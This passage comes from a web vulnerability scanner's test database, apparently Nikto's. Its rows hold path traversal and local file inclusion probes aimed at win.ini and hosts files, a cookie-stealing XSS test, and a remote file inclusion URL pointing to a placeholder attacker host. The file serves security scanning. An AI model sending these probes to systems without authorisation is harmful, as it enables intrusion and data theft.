scanner.\",\"\",\"\"\n\"002427\",\"\",\"1\",\"/forum1_professionnel.asp?n=1771&amp;nn=/....../Windows/win.ini&amp;page=1\",\"GET\",\"@LFI()\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002428\",\"\",\"1\",\"/forum1_professionnel.asp?n=1771&amp;nn=@LFI()&amp;page=1\",\"GET\",\"@LFI()\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002429\",\"\",\"1\",\"/forum1_professionnel.asp?n=1771&amp;nn=@LFI(abs)&amp;page=1\",\"GET\",\"@LFI()\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002430\",\"\",\"1\",\"/forum1_professionnel.asp?n=1771&amp;nn=/.\\\"./.\\\"./.\\\"./.\\\"./.\\\"./Windows/win.inii&amp;page=1\",\"GET\",\"@LFI()\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002433\",\"\",\"1\",\"/forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=%60@LFI()%60\",\"GET\",\"@LFI()\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002434\",\"\",\"1\",\"/forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=....//....//....//....//....//....//....//etc.hosts\",\"GET\",\"@LFI()\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002435\",\"\",\"1\",\"/forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=@LFI()%00\",\"GET\",\"@LFI()\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002436\",\"\",\"1\",\"/forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=/....../Windows/win.ini\",\"GET\",\"@LFI()\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002437\",\"\",\"1\",\"/forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=/..../Windows/win.ini\",\"GET\",\"@LFI()\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002438\",\"\",\"1\",\"/forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=/.../.../.../.../.../.../Windows/win.ini\",\"GET\",\"@LFI()\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002439\",\"\",\"1\",\"/forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=/../../../../../../../../../../../../../../../../../../../../Windows/win.ini\",\"GET\",\"@LFI()\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002440\",\"\",\"1\",\"/forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=/@LFI()\",\"GET\",\"@LFI()\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002441\",\"\",\"1\",\"/forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=/.\\\"./.\\\"./.\\\"./.\\\"./.\\\"./Windows/win.ini\",\"GET\",\"@LFI()\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002442\",\"\",\"1\",\"/forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=@LFI()\",\"GET\",\"@LFI()\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002444\",\"\",\"1\",\"/forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=@LFI(abs)\",\"GET\",\"@LFI()\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002445\",\"\",\"1\",\"/forum1_professionnel.asp?n=1771&amp;nn=@LFI(abs)i&amp;page=1\",\"GET\",\"@LFI()\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002446\",\"\",\"1\",\"/forum1_professionnel.asp?n=@LFI(abs)&amp;nn=100&amp;page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.\",\"GET\",\"@LFI()\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002447\",\"\",\"1\",\"/forum_arc.asp?n=%60@LFI(abs)%60|36|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;`&#039;.\",\"GET\",\"@LFI()\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002448\",\"\",\"1\",\"/forum_arc.asp?n=@LFI()%00|36|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.\",\"GET\",\"@LFI()\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002449\",\"\",\"1\",\"/forum_arc.asp?n=/....../Windows/win.ini|36|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.\",\"GET\",\"@LFI()\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002450\",\"\",\"1\",\"/forum_arc.asp?n=/.../.../.../.../.../.../Windows/win.ini|36|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.\",\"GET\",\"@LFI()\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002451\",\"\",\"1\",\"/forum_arc.asp?n=/../../../../../../../../../../../../../../../../../../../../Windows/win.ini|36|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.\",\"GET\",\"@LFI()\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002452\",\"\",\"1\",\"/forum_arc.asp?n=/@LFI()|36|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.\",\"GET\",\"@LFI()\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002453\",\"\",\"1\",\"/forum_arc.asp?n=/.\\\"./.\\\"./.\\\"./.\\\"./.\\\"./Windows/win.ini|36|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.\",\"GET\",\"@LFI()\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002454\",\"\",\"1\",\"/forum_arc.asp?n=@LFI(abs)%00|36|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.\",\"GET\",\"@LFI()\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002455\",\"\",\"1\",\"/forum_arc.asp?n=@LFI(abs)|36|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.\",\"GET\",\"@LFI()\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002456\",\"\",\"1\",\"/forum_arc.asp?n=268\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002457\",\"\",\"1\",\"/forum_arc.asp?n=c:\\@LFI(abs,win)|36|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;c:&#039;.\",\"GET\",\"@LFI()\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002458\",\"\",\"1\",\"/forum_professionnel.asp?n=%60@LFI(abs)%60|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;`&#039;.\",\"GET\",\"@LFI()\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002459\",\"\",\"1\",\"/forum_professionnel.asp?n=....//....//....//....//....//....//....//etc.hosts|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.\",\"GET\",\"@LFI()\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002460\",\"\",\"1\",\"/forum_professionnel.asp?n=@LFI()%00|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.\",\"GET\",\"@LFI()\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002461\",\"\",\"1\",\"/forum_professionnel.asp?n=/....../Windows/win.ini|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.\",\"GET\",\"@LFI()\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002462\",\"\",\"1\",\"/forum_professionnel.asp?n=/.../.../.../.../.../.../Windows/win.ini|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.\",\"GET\",\"@LFI()\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002463\",\"\",\"1\",\"/forum_professionnel.asp?n=/../../../../../../../../../../../../../../../../../../../../Windows/win.ini|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.\",\"GET\",\"@LFI()\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002464\",\"\",\"1\",\"/forum_professionnel.asp?n=/@LFI()|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.\",\"GET\",\"@LFI()\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002465\",\"\",\"1\",\"/forum_professionnel.asp?n=/.\\\"./.\\\"./.\\\"./.\\\"./.\\\"./Windows/win.ini|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.\",\"GET\",\"@LFI()\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002466\",\"\",\"1\",\"/forum_professionnel.asp?n=@LFI(abs)%00|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.\",\"GET\",\"@LFI()\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002467\",\"\",\"1\",\"/forum_professionnel.asp?n=@LFI(abs)|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.\",\"GET\",\"@LFI()\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002468\",\"\",\"1\",\"/forum_professionnel.asp?n=100\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002469\",\"\",\"1\",\"/forum_professionnel.asp?n=@LFI(abs)|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;c:&#039;.\",\"GET\",\"@LFI()\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002470\",\"\",\"1\",\"/functions.inc.php+\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002471\",\"CVE-2002-0596\",\"3\",\"/get_od_toc.pl?Profile=\",\"GET\",\"BODY:PROGRA~1\",\"WebTrends get_od_toc.pl may be vulnerable to a path disclosure error if this file is reloaded multiple times.\",\"\",\"\"\n\"002472\",\"\",\"1\",\"/globals.php3\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002473\",\"\",\"1\",\"/globals.pl\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002474\",\"https://seclists.org/fulldisclosure/2004/Jun/49\",\"6\",\"/Gozila.cgi\",\"GET\",\"CODE:200\",\"Linksys BEF Series routers are vulnerable to multiple DoS attacks in Gozila.cgi.\",\"\",\"\"\n\"002475\",\"CVE-2001-1054\",\"c\",\"/helperfunction.php?includedir=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"phpAdsNew or SIPS helperfunction.php maybe vulnerable to remote file inclusion.\",\"\",\"\"\n\"002476\",\"\",\"1\",\"/homebet/homebet.dll?form=menu&amp;option=menu-signin\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002477\",\"CVE-2006-0308\",\"c\",\"/htmltonuke.php?filnavn=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"HTMLtoNuke filnavn variable allows remote file inclusion.\",\"\",\"\"\n\"002478\",\"\",\"1\",\"/idealbb/error.asp?|-|0|404_Object_Not_Found\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002479\",\"\",\"1\",\"/iisprotect/admin/SiteAdmin.ASP?|-|0|404_Object_Not_Found\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002480\",\"\",\"1\",\"/imprimer.asp?no=%60@LFI(abs)%60|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;`&#039;.\",\"GET\",\"@LFI()\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002481\",\"\",\"1\",\"/imprimer.asp?no=....//....//....//....//....//....//....//etc.hosts|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.\",\"GET\",\"@LFI()\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002482\",\"\",\"1\",\"/imprimer.asp?no=@LFI()%00|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.\",\"GET\",\"@LFI()\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002483\",\"\",\"1\",\"/imprimer.asp?no=/....../Windows/win.ini|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.\",\"GET\",\"@LFI()\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002484\",\"\",\"1\",\"/imprimer.asp?no=/.../.../.../.../.../.../Windows/win.ini|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.\",\"GET\",\"@LFI()\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002485\",\"\",\"1\",\"/imprimer.asp?no=/../../../../../../../../../../../../../../../../../../../../Windows/win.ini|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.\",\"GET\",\"@LFI()\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002486\",\"\",\"1\",\"/imprimer.asp?no=/@LFI()|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.\",\"GET\",\"@LFI()\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002487\",\"\",\"1\",\"/imprimer.asp?no=/.\\\"./.\\\"./.\\\"./.\\\"./.\\\"./Windows/win.ini|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.\",\"GET\",\"@LFI()\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002488\",\"\",\"1\",\"/imprimer.asp?no=@LFI(abs)%00|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.\",\"GET\",\"@LFI()\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002489\",\"\",\"1\",\"/imprimer.asp?no=@LFI(abs)|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.\",\"GET\",\"@LFI()\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002491\",\"\",\"1\",\"/include/customize.php\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002492\",\"\",\"1\",\"/include/help.php\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002493\",\"\",\"1\",\"/includes/footer.php3\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002494\",\"\",\"1\",\"/includes/header.php3\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002500\",\"\",\"1\",\"/index.php?topic=&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;%20\",\"GET\",\"BODY:alert\\\\\\(document\\.cookie\\\\\\)\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002501\",\"\",\"1\",\"/infos/contact/index.asp\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002502\",\"\",\"1\",\"/infos/faq/index.asp\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002503\",\"\",\"1\",\"/infos/gen/index.asp\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002504\",\"\",\"1\",\"/infos/services/index.asp\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002505\",\"\",\"1\",\"/instaboard/index.cfm\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002506\",\"\",\"1\",\"/intranet/browse.php\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002507\",\"\",\"1\",\"/invitefriends.php3\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002508\",\"\",\"1\",\"/ipchat.php\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002509\",\"\",\"1\",\"/ixmail_netattach.php\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002510\",\"\",\"1\",\"/jsptest.jsp+\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002511\",\"\",\"1\",\"/kernel/class/delete.php\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002512\",\"\",\"1\",\"/kernel/classes/ezrole.php\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002513\",\"\",\"1\",\"/ldap.search.php3?ldap_serv=nonsense%20\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002514\",\"\",\"1\",\"/livredor/index.php\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002515\",\"\",\"1\",\"/login.php3?reason=chpass2%20\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002516\",\"\",\"1\",\"/mail/include.html\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002517\",\"\",\"1\",\"/mail/settings.html\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002518\",\"\",\"1\",\"/mail/src/read_body.php\",\"GET\",\"BODY:Project\\sTeam\",\"SquirrelMail found\",\"\",\"\"\n\"002519\",\"\",\"1\",\"/mailview.cgi?cmd=view&amp;fldrname=inbox&amp;select=1&amp;html=@LFI()\",\"GET\",\"@LFI()\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002520\",\"\",\"1\",\"/mambo/banners.php\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002521\",\"\",\"1\",\"/manage/login.asp+\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002522\",\"\",\"1\",\"/mantis/summary_graph_functions.php?g_jpgraph_path=http%3A%2F%2Fattackershost%2Flistings.txt%3F\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002523\",\"\",\"1\",\"/members/ID.pm\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002524\",\"\",\"1\",\"/members/ID.xbb\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002525\",\"\",\"1\",\"/mod.php\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002526\",\"\",\"1\",\"/modif/delete.php\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002527\",\"\",\"1\",\"/modif/ident.php\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002528\",\"\",\"1\",\"/modif_infos.asp?n=%60@LFI(abs)%60\",\"GET\",\"@LFI()\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002529\",\"\",\"1\",\"/modif_infos.asp?n=....//....//....//....//....//....//....//etc.hosts\",\"GET\",\"@LFI()\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002530\",\"\",\"1\",\"/modif_infos.asp?n=@LFI()%00\",\"GET\",\"@LFI()\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002531\",\"\",\"1\",\"/modif_infos.asp?n=/....../Windows/win.ini\",\"GET\",\"@LFI()\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002532\",\"\",\"1\",\"/modif_infos.asp?n=/.../.../.../.../.../.../Windows/win.ini\",\"GET\",\"@LFI()\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002533\",\"\",\"1\",\"/modif_infos.asp?n=/../../../../../../../../../../../../../../../../../../../../Windows/win.ini\",\"GET\",\"@LFI()\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002534\",\"\",\"1\",\"/modif_infos.asp?n=/@LFI()\",\"GET\",\"@LFI()\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002535\",\"\",\"1\",\"/modif_infos.asp?n=/.\\\"./.\\\"./.\\\"./.\\\"./.\\\"./Windows/win.ini\",\"GET\",\"@LFI()\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002536\",\"\",\"1\",\"/modif_infos.asp?n=@LFI()\",\"GET\",\"@LFI()\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002537\",\"\",\"1\",\"/modif_infos.asp?n=@LFI(abs)%00\",\"GET\",\"@LFI()\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002539\",\"\",\"1\",\"/modules/Downloads/voteinclude.php+\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002540\",\"\",\"1\",\"/modules/Forums/attachment.php\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002541\",\"\",\"1\",\"/modules/Search/index.php\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002542\",\"\",\"1\",\"/modules/WebChat/in.php+\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002543\",\"\",\"1\",\"/modules/WebChat/out.php\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002544\",\"\",\"1\",\"/modules/WebChat/quit.php\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002545\",\"\",\"1\",\"/modules/WebChat/users.php\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002546\",\"\",\"1\",\"/modules/Your_Account/navbar.php+\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002547\",\"\",\"1\",\"/moregroupware/modules/webmail2/inc/\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002548\",\"\",\"1\",\"/msadc/Samples/SELECTOR/showcode.asp?|-|0|404_Object_Not_Found\",\"GET\",\"CODE:200&&!BODY:Access Denied\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002549\",\"\",\"1\",\"/myguestBk/add1.asp?|-|0|404_Object_Not_Found\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002550\",\"\",\"1\",\"/myguestBk/admin/delEnt.asp?id=NEWSNUMBER|-|0|404_Object_Not_Found\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002551\",\"\",\"1\",\"/myguestBk/admin/index.asp?|-|0|404_Object_Not_Found\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002552\",\"\",\"1\",\"/netget?sid=Safety&amp;msg=2002&amp;file=Safety\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002553\",\"\",\"1\",\"/newtopic.php\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002554\",\"\",\"1\",\"/nphp/nphpd.php\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002555\",\"\",\"1\",\"/OpenTopic\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002556\",\"\",\"1\",\"/options.inc.php+\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002557\",\"\",\"1\",\"/oscommerce/default.php\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002558\",\"\",\"1\",\"/parse_xml.cgi\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002559\",\"\",\"1\",\"/php/gaestebuch/admin/index.php\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002560\",\"\",\"1\",\"/php/php4ts.dll\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002561\",\"\",\"1\",\"/pks/lookup\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002562\",\"\",\"1\",\"/pm/lib.inc.php\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002563\",\"\",\"1\",\"/poppassd.php3+\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002564\",\"\",\"1\",\"/produccart/pdacmin/login.asp?|-|0|404_Object_Not_Found\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002565\",\"https://packetstormsecurity.com/files/32406/xmas.txt.html\",\"1\",\"/productcart/database/EIPC.mdb\",\"GET\",\"CODE:200\",\"Seen in carding forums.\",\"\",\"\"\n\"002566\",\"\",\"1\",\"/productcart/pc/Custva.asp?|-|0|404_Object_Not_Found\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002567\",\"\",\"1\",\"/ProductCart/pc/msg.asp?|-|0|404_Object_Not_Found\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002568\",\"\",\"1\",\"/product_info.php\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002569\",\"\",\"1\",\"/prometheus-all/index.php\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002571\",\"\",\"1\",\"/protected/\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown 